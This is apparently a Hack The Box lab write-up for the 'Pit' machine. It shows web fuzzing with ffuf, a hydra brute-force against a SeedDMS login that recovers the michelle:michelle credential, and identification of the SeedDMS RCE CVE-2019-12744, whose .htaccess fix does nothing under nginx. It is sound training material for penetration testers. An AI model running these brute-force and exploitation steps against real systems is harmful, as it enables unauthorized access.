Web
Nmap discovered a web server on the target port 80
The running service is nginx 1.14.1
Webroot
It’s the default Nginx installation page for RHEL Linux
i get a 403 if i navigate to the http://dms-pit.htb/ URL
Fuzzing
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP/FUZZ -ic -e .php,.txt,.html
________________________________________________
:: Method : GET
:: URL : http://10.10.10.241/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .txt .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 4057, Words: 1711, Lines: 118, Duration: 97ms]
404.html [Status: 200, Size: 3971, Words: 1723, Lines: 121, Duration: 92ms]
:: Progress: [882188/882188] :: Job [1/1] :: 424 req/sec :: Duration: [0:54:23] :: Errors: 0 ::ffuf doesn’t find anything
Sub-domain / Virtual Host Discovery
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/dns/subdomains-top1million-110000.txt -u http://$IP/ -H 'Host: FUZZ.dms-pit.htb' -fs 4057
________________________________________________
:: Method : GET
:: URL : http://10.10.10.241/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.dms-pit.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 4057
________________________________________________
:: Progress: [114441/114441] :: Job [1/1] :: 425 req/sec :: Duration: [0:05:59] :: Errors: 0 ::┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/dns/subdomains-top1million-110000.txt -u http://$IP/ -H 'Host: FUZZ.pit.htb' -fs 4057
________________________________________________
:: Method : GET
:: URL : http://10.10.10.241/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.pit.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 4057
________________________________________________
:: Progress: [114441/114441] :: Job [1/1] :: 426 req/sec :: Duration: [0:06:34] :: Errors: 0 ::No sub-domain/virtual host found in the target port 80 over HTTP
SeedDMS
Earlier SNMP enumeration suggested that there is an instance of SeedDMS at the /var/www/html/seeddms51x/seeddms directory
SeedDMS is a free and open-source document management system (DMS) that allows businesses to store, share, and track electronic documents. It provides features like full-text search, version control, access control, and audit trails, making it suitable for managing a wide range of documents. SeedDMS is written in PHP and can be easily customized and extended to meet specific business requirements.
Heading over to the suggested directory, I get re-direct to a login page
I tried some default/weak credentials and none of them work.
Then, I realized that I also got a valid system user; michelle, from the earlier SNMP enumeration
Brute-force Attack
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ hydra -l michelle -p /usr/share/wordlists/rockyou.txt 'http-post-form://dms-pit.htb:80//seeddms51x/seeddms/op/op.Login.php:login=^USER^&pwd=^PASS^&lang=en_GB:F=Error signing in. User ID or password incorrect.'
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-07 13:08:02
[data] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[data] attacking http-post-form://dms-pit.htb:80//seeddms51x/seeddms/op/op.Login.php:login=^USER^&pwd=^PASS^&lang=en_GB:F=Error signing in. User ID or password incorrect.
[80][http-post-form] host: dms-pit.htb login: michelle password: michelle
1 of 1 target successfully completed, 1 valid password found
hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-07 13:08:09I was able to brute-force the password of the michelle user against the SeedDMS login page
the credential is michelle:michelle
Web GUI
Successfully signed-in to the web application
I see a directory, /Docs/, and a note, /Upgrade Note
Both are owned by Administrator
/Docs/
The /Docs/ directory has 2 sub-directories
While both sub-directories are empty, I notice that there is another user, Jack
Upgrade Note
The note mentions that the platform has been upgraded to the version 5.1.15 from 5.1.10 due to security issue
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ head CHANGELOG
--------------------------------------------------------------------------------
Changes in version 5.1.15
--------------------------------------------------------------------------------
- Improved import from file system
- HTTP Proxy for access on external extension repository can be set
- Do not use unzip in ExtensionMgr anymore
- fix version compare on info page
- allow one page mode on search page
- fix import of older extension versions from repositoryAttached file indeed confirms the version information 5.1.15
Vulnerability
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ searchsploit SeedDMS 5.1
------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------ ---------------------------------
Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50062.py
SeedDMS 5.1.18 - Persistent Cross-Site Scripting | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution | php/webapps/47022.txt
------------------------------------------------------------------ ---------------------------------
shellcodes: No Results
papers: No ResultsThe output indeed reveals an RCE exploit targeting SeedDMS versions < 5.1.11
That must be what the note pointed out
CVE-2019-12744
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ searchsploit -x php/webapps/47022.txt
Exploit: SeedDMS versions < 5.1.11 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/47022
Path: /usr/share/exploitdb/exploits/php/webapps/47022.txt
Codes: CVE-2019-12744
Verified: False
File Type: ASCII textThe CVE exploit target CVE-2019-12744
Checking the CHANGELOG file for the identified RCE exploit (CVE-2019-12744) reveals that, it was mitigated by adding .htaccess to the /data/ directory in the version 5.1.11
.htaccess
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ curl -s 'http://dms-pit.htb/seeddms51x/data/.htaccess'
# line below if for Apache 2.4
<ifModule mod_authz_core.c>
Require all denied
</ifModule>
# line below if for Apache 2.2
<ifModule !mod_authz_core.c>
deny from all
Satisfy All
</ifModule>
# section for Apache 2.2 and 2.4
<ifModule mod_autoindex.c>
IndexIgnore *
</ifModule>The .htaccess file is indeed present in the /data/ directory.
However, it is important to note that the .htaccess file is an Apache specific file allowing for directory-level configurations to be set by placing the file in a specific directory.
This application uses Nginx as the web server. Not Apache
This means that the target web application still might be subjected to CVE-2019-12744 and vulnerable to the RCE exploit above.